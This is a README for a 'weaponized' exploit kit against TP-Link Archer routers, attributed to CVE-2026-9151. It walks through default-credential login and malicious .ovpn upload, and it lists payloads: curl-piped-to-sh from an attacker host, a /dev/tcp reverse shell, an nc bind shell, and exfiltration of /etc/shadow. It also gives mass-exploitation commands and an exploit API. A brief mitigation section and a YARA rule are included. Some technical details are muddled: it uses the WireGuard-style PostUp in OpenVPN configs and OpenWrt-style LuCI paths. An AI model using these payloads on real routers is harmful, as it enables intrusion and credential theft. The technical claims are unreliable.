# CVE-2026-9151 TP-Link Archer Exploit Kit (Upgraded) **CVE-2026-9151 — TP-Link Archer Series OS Command Injection via VPN Client Config** **Military-Grade Multi-Router RCE via Malicious .ovpn Upload** ![Severity](https://img.shields.io/badge/Severity-Critical-red) ![CVSS](https://img.shields.io/badge/CVSS-9.8-red) ![Status](https://img.shields.io/badge/Status-Weaponized-red) --- ## Overview CVE-2026-9151 is a critical OS command injection vulnerability in **TP-Link Archer Series** routers (AX12, AX17, AX18, AX1300, and similar models). The vulnerability exists in the VPN client configuration management functionality, allowing authenticated attackers to execute arbitrary system commands via malicious OpenVPN configuration files. ### Affected Models | Model | Firmware | VPN Support | |-------|----------|-------------| | Archer AX12 v1 | Multiple | OpenVPN client | | Archer AX17 v1 | Multiple | OpenVPN client | | Archer AX18 v1 | Multiple | OpenVPN/WireGuard | | Archer AX1300 v1.6 | Multiple | OpenVPN client | ### Exploitation Mechanism 1. **Authenticate** to router web interface (default credentials: admin/admin) 2. **Generate malicious OpenVPN config** with `PostUp` command injection 3. **Upload config** via VPN client config upload endpoint 4. **Apply config** → Command executes with router privileges 5. **Achieve RCE** via reverse shell or arbitrary command execution --- ## Technical Details ### Vulnerable Code Flow ``` Client uploads .ovpn file ↓ Router parses OpenVPN config via OpenVPN binary or custom parser ↓ Parser extracts PostUp/up/script directives ↓ System executes PostUp via system() or popen() ↓ COMMAND INJECTION → RCE ``` ### Malicious Configuration Payload **PostUp Injection Payload:** ```ovpn client dev tun proto udp remote attacker-ip 4444 resolv-retry infinite nobind persist-key persist-tun remote-cert-tls server cipher AES-256-GCM auth SHA512 verb 3 ; Reconnaissance commands whoami id cat /etc/passwd PostUp=curl http://attacker-ip:8000/shell.sh|sh ``` **Alternative Payload Patterns:** | Payload Type | PostUp/script | Use Case | |-------------|---------------|----------| | **Download & Execute** | `PostUp=wget http://lh:8000/s -O /tmp/s && chmod +x /tmp/s && /tmp/s` | Custom implant delivery | | **Reverse Shell** | `PostUp=bash -c 'bash -i >& /dev/tcp/lh/lp 0>&1'` | Interactive access | | **Bind Shell** | `PostUp=nc -l -p 4444 -e /bin/sh` | Direct connection | | **Data Exfil** | `PostUp=curl -F"file=@/etc/shadow" http://lh:8000/` | Credential theft | --- ## Attack Surface Analysis ### Router Attack Surface | Component | Exposure | Authentication | |-----------|----------|----------------| | Web Management UI | HTTP/HTTPS | Default creds (admin/admin) | | VPN Client Config | Authenticated | Same as web UI | | UPnP/NAT-PMP | Often enabled | No auth | | WPS | Often enabled | PIN brute force | ### Default Credentials Most TP-Link Archer models ship with: - **Username:** `admin` - **Password:** `admin` (or blank) The scanner automatically tests common credential pairs before exploitation. --- ## Repository Structure ``` tplink_archer_20269151_upgraded/ ├── requirements.txt # Python dependencies ├── scanner.py # Async scanner with VPN endpoint detection ├── exploit.py # Multi-router exploitation framework └── README.md # This file ``` --- ## Quick Start ### 1. Install Dependencies ```bash python3.11 -m venv .venv source .venv/bin/activate pip install --upgrade pip pip install -r requirements.txt ``` ### 2. Reconnaissance Scan ```bash # CIDR sweep for Archer routers python scanner.py -n 192.168.1.0/24 -o scan_results.json # Single target python scanner.py -t 192.168.1.1 # Target list python scanner.py -f targets.txt --threads 200 # Sample output: # Target: 192.168.1.1 # Status: VULNERABLE (confidence: 85%) # [VPN] /cgi-bin/luci/admin/vpn/client # [VPN] /cgi-bin/luci/admin/vpn/client/upload # [VPN] /cgi-bin/luci/admin/vpn/client/apply # → http/80: TP-Link Archer AX12 Web UI ``` ### 3. Exploitation ```bash # Single router with reverse shell python exploit.py -t 192.168.1.1 --lhost 10.0.0.5 --lport 4444 # Custom credentials python exploit.py -t 192.168.1.1 -u admin -p mypassword --lhost 10.0.0.5 --lport 4444 # Mass exploitation python exploit.py -f targets.txt --lhost 10.0.0.5 -o results.json -w 20 # HTTPS target python exploit.py -t 192.168.1.1 --ssl --lhost 10.0.0.5 --lport 4444 # Alternative payload types python exploit.py -t 192.168.1.1 --lhost 10.0.0.5 --payload-type shell_inline ``` --- ## Exploit Module API ### Direct Function Calls ```python from exploit import ( exploit_cve2026_9151, generate_malicious_ovpn, generate_alternative_payloads, AuthManager, Target, ) # Generate malicious config ovpn = generate_malicious_ovpn("10.0.0.5", 4444) print(ovpn) # Generate multiple payload variants payloads = generate_alternative_payloads("10.0.0.5", 4444) for p in payloads: print(f"{p['name']}: {p['content'][:100]}") # Single target exploitation ok, details, config_id = exploit_cve2026_9151( "192.168.1.1", lhost="10.0.0.5", lport=4444, username="admin", password="admin", use_ssl=False ) # Using AuthManager directly target = Target(ip="192.168.1.1", port=80, ssl=False) auth = AuthManager(target) ok = auth.authenticate("admin", "admin") ``` --- ## Exploitation Flow ### Step-by-Step Exploitation ``` [1] Target Discovery → Scan network for TP-Link Archer web interfaces → Identify VPN endpoints [2] Authentication → Try default credentials (admin/admin) → Maintain session with CSRF token handling [3] Malicious Config Generation → Generate .ovpn with PostUp command injection → Multiple payload variants for reliability [4] Config Upload → POST to /cgi-bin/luci/admin/vpn/client/upload → Boundary: multipart/form-data [5] Config Activation → POST to /cgi-bin/luci/admin/vpn/client/apply → Triggers PostUp script execution [6] Command Execution → Commands run as router root/admin → Reverse shell established → Persistent access achieved ``` --- ## Detection & Mitigation ### Network Indicators | Indicator | Description | |-----------|-------------| | HTTP POST `/cgi-bin/luci/admin/vpn/client/upload` | Config upload attempt | | HTTP POST `/cgi-bin/luci/admin/vpn/client/apply` | Config activation | | `PostUp=` in OpenVPN config | Command injection indicator | | Outbound connections from router | Reverse shell/DNS callback | ### YARA Rule ```yara rule Archer_CVE_2026_9151_Payload { strings: $postup = "PostUp=" nocase $ovpn = ".ovpn" nocase $vpn_client = "vpn/client" nocase $admin = "/cgi-bin/luci" nocase condition: any of them } ``` ### Mitigations 1. **Immediate**: Change default admin credentials 2. **Firmware**: Update to latest TP-Link release 3. **Network**: Place Archer on isolated management VLAN 4. **VPN**: Disable VPN client functionality if not required 5. **WAF**: Block config upload endpoints from external sources 6. **Monitoring**: Alert on VPN config changes and PostUp patterns --- ## Weaponization Features | Feature | Implementation | |---------|----------------| | **Multi-Router Parallel Exploit** | ThreadPoolExecutor with configurable workers | | **Auto-Auth** | CSRF token extraction, credential brute forcing | | **Payload Variants** | 3 different PostUp injection patterns | | **Router Fingerprinting** | Archer model detection via HTTP responses | | **Config ID Auto-Discovery** | Parses existing configs or uses predictable IDs | | **Session Persistence** | Maintains authenticated session throughout exploit chain | --- ## Legal & Ethics This toolkit is provided for: - Authorized penetration testing of infrastructure you own - CISA/NCC/NCSC-aligned defensive research - Detection rule development and purple-team exercises - Red team / bug bounty programmes with explicit written scope **Unauthorized use against systems you do not own is a criminal offence** under CFAA (US), Computer Misuse Act (UK), GDPR Art. 32 (EU), and equivalent legislation worldwide. TP-Link and Archer are trademarks of TP-Link Technologies Co., Ltd. No endorsement by TP-Link is implied or intended. --- ## References | CVE | Description | |-----|-------------| | CVE-2026-9151 | TP-Link Archer Series OS Command Injection via VPN Client Config | --- ## Version History | Version | Date | Changes | |---------|------|---------| | 2.0.0 | 2026-06-13 | Complete rewrite: async scanner, CSRF-aware auth, multiple payload types | | 1.0.0 | 2026-06-11 | Initial release (basic config upload exploit) | --- ## Author Advanced Persistent Security Research Military-grade exploit engineering for authorized assessment only.